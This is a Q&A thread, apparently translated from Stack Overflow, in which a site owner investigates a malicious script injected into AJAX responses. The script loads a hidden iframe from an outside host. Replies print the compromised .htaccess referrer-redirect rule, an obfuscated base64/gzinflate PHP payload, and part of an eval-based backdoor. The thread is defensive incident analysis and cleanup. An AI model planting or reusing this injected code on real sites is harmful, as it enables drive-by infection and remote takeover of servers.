-2

每当在http://www.btandthetenants.com网站上单击链接时,我都会收到一个 AJAX 请求来自动加载内容。然而,最近,我看到在我的返回数据中注入了这段令人困惑的代码:

<script>
    var _q = document.createElement('iframe'),
        _n = 'setAttribute';
    _q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
    _q.style.position = 'absolute';
    _q.style.width = '12px';
    _q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
    _q.style.left = '-4327px';
    document.write('<div id=\'pzeadv\'></div>');
    document.getElementById('pzeadv').appendChild(_q);​
</script>

这是我当前的点击代码:

$("#nav a").click(function(event) {
    var sHREF = $(this).attr("href");
    var sPage = sHREF.replace(oVars.sPrefix(), "");

    if (oVars.sCurrent != sPage) {
        // As long as we're not currently on the page we just clicked on...
        //oVars.sCurrent = sPage;
        if (oVars.oArchive.isOpen()) oVars.oArchive.toggle();
        loadContent(sHREF, true, false);
        track(sPage);
    }
    event.preventDefault();
});​

...和loadContent功能:

function loadContent(sURL, bPush, bReplace) {

    var $Box = $("#loaded .box-1"),
        $Content = $Box.find(".inner");

    $("#nav a").removeClass("active");

    $("#nav a[href='"+ sURL +"']").addClass("active");

    oVars.sCurrent = sURL.split("&")[0];

    // Closes any picture open in Colorbox.

    if ( oVars.sCurrent != "pictures" && oVars.bI && $("#colorbox").css("display") != "none" )
        $.colorbox.close();

    if (!oVars.bIE) {

        if (bPush) {

            var objState = { page: oVars.sCurrent };

            if (bReplace)
                history.replaceState(objState, "", "");
            else
                history.pushState(objState, "", sURL);

        } else {}

    }

    if (!bReplace) {

        // Load the page.

        $Box.slideUp(oVars.iSpeed / 2, "", function() {

            $.get(

                "index.php" + oVars.sPrefix() + sURL,

                oVars.oNHF,

                function(sData) {

                    var $El = $(sData).filter(":first"),                // This is the element that would be displayed
                        $Script = $(sData).filter(":last"),
                        sPage = extractPage("ending").toLowerCase();

                    console.debug(sData);

                    // Change documentElement to body and circumvent the issues caused by the iPhone version... yadda yadda.

                    document.documentElement.className = sPage;

                    // Try and make it a regular expression to replace the words after the separator.

                    document.title = oPHP.const.NAME + oPHP.const.TEXT_DIVIDER + ( (sPage == "home") ? "Home" : oPHP.vars.titles[sPage].replace(/\<.*\>/, "").trim() );//ucwords(sPage);

                    $Box.html(sData).slideDown(oVars.iSpeed / 2);

                    // Reload the Facebook widgets for the current page.

                    reloadWidgets();

                }

            );

        } );

    }

}

sDatain在开头loadContent返回那个神秘的标签,如下所示:<script>

<script>

// THIS IS THE EVIL SNIPPET THAT'S BEING INSERTED INTO MY CODE.

var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);

</script>

<div class="box-1" id="pictures">
    <div class="title">
        Pictures <span class="links"><a class="fblink" href="http://www.facebook.com/elemovements?sk=photos" target="_blank" title="Visit this Page on Facebook">View on Facebook</a></span>
    </div>
    <div class="body">
        <div class="inner transition">
            <div>
                <div class="section-title">
                    Albums
                </div>
                <span class="gray italic size">(4 albums, 13 pictures)</span>
            </div>
            <div class="album-container">
                <a fb-href="http://www.facebook.com/album.php?fbid=332120860192434&id=156848747719647&aid=77394" href="pictures&action=list_pics&aid=156848747719647_77394&size=1&name=Wall Photos" title="">
                <div class="album">
                    <img src="http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/527637_332120863525767_1834367592_s.jpg">
                </div>
                </a>
                <div class="name">
                    <a fb-href="http://www.facebook.com/album.php?fbid=332120860192434&id=156848747719647&aid=77394" href="pictures&action=list_pics&aid=156848747719647_77394&size=1&name=Wall Photos" title="">Wall Photos</a>
                </div>
            </div>
            <div class="album-container">
                <a fb-href="http://www.facebook.com/album.php?fbid=171845276219994&id=156848747719647&aid=44093" href="pictures&action=list_pics&aid=156848747719647_44093&size=2&name=Posters" title="">
                <div class="album">
                    <img src="http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/427627_278221322249055_1137145612_s.jpg">
                </div>
                </a>
                <div class="name">
                    <a fb-href="http://www.facebook.com/album.php?fbid=171845276219994&id=156848747719647&aid=44093" href="pictures&action=list_pics&aid=156848747719647_44093&size=2&name=Posters" title="">Posters</a>
                </div>
            </div>
            <div class="album-container">
                <a fb-href="http://www.facebook.com/album.php?fbid=261713630566491&id=156848747719647&aid=63000" href="pictures&action=list_pics&aid=156848747719647_63000&size=4&name=Newby's Show" title="The guys' show on 1/29/2012 at Newby's. Taken in Memphis, TN.">
                <div class="album">
                    <img src="http://photos-f.ak.fbcdn.net/hphotos-ak-ash4/407659_261713673899820_1183906213_s.jpg">
                </div>
                </a>
                <div class="name">
                    <a fb-href="http://www.facebook.com/album.php?fbid=261713630566491&id=156848747719647&aid=63000" href="pictures&action=list_pics&aid=156848747719647_63000&size=4&name=Newby's Show" title="The guys' show on 1/29/2012 at Newby's. Taken in Memphis, TN.">Newby's Show</a>
                </div>
            </div>
            <div class="album-container">
                <a fb-href="http://www.facebook.com/album.php?fbid=232326246838563&id=156848747719647&aid=56722" href="pictures&action=list_pics&aid=156848747719647_56722&size=6&name=Oxford Show" title="Taken in Oxford, MS.">
                <div class="album">
                    <img src="http://photos-d.ak.fbcdn.net/hphotos-ak-ash4/390726_232326290171892_2122883596_s.jpg">
                </div>
                </a>
                <div class="name">
                    <a fb-href="http://www.facebook.com/album.php?fbid=232326246838563&id=156848747719647&aid=56722" href="pictures&action=list_pics&aid=156848747719647_56722&size=6&name=Oxford Show" title="Taken in Oxford, MS.">Oxford Show</a>
                </div>
            </div>
            <script id="logic" language="javascript" src="min/?f=/js/logic/pictures.js" type="text/javascript"></script>
        </div>
    </div>
</div>

我的数据在脚本标签之后,它不在我的代码中。您可以随时在某种控制台中自行检查。

4

2 回答 2

1

.htaccess这是由于对我服务器上的文件的修改引起的。我有一个本地副本,所以我覆盖了它。该文件的内容变为:

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://cabaniaseleden.com.ar/stats.php [R=301,L]
</IfModule>
#/c3284d#

RewriteEngine on

RewriteCond %{HTTP_HOST} ^ts\.x10\.mx$ [OR]
RewriteCond %{HTTP_HOST} ^www\.ts\.x10\.mx$
RewriteRule ^/?$ "http\:\/\/75\.66\.61\.141\/" [R=301,L]

黑客还将其添加到我网站上的几个 PHP 文件中:

#c3284d#
echo(gzinflate(base64_decode("VVHBboMwDL1X4h9yC2hdKDCVbqOVummHnfYB64RCYkokmqSJS9t9/YChavPN9nt+9nPhhVMWN8Gs446UR7Im0ojTATQy4YAjvLUwZCFVteMHoNE8mJE+St1jqQfcIjpVnRDoczArj5+l/gqpd4LOCW0Q7VMcC15xrbiHFiRoJsyBcRd75OiZbSyNRibzeG2BWeMVKjOO55U37W30BDgric3QTVJ7+Ss6LlgZJ8H14pp3as/ROHby4Lb74SSlJVw+6pBmjyLL0uWiXsp8mSeQSg55vVjJZLHKIU1pRO5I8m+vFmocVO8fsjT/Fb5ZdXYKIaSFVB1Rcr2j9hu47HZ0U8R9bTNeeEPvASdXX67vMpzANGLcWtDytVGtDMvjwCni6UE/")));
#/c3284d#

我们需要与此类互联网入侵作斗争,以防止此类事情发生。它基本上在我访问的每台服务器上。我不知道它是如何到达那里的;必须检查日志。

于 2012-06-29T22:24:39.483 回答
0

是的我同意。另外...请检查根目录中的额外文件。它可以命名为任何 c.php、default.php 等...它有一个 php 代码开头:

if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13......

您也可以进行网站搜索。该文件是在更改上述 .htaccess 代码的同时添加的。

我试图追踪的不是来源,而是它的上传方式,看起来它是通过 FTP 完成的。保护您的 FTP,如果您运行 WordPress 或 Joomla,请保护您的登录页面免受暴力/彩虹攻击,这在用户名已知时非常简单(在帖子下列出)有人有更多详细信息吗?

于 2012-07-12T05:41:55.123 回答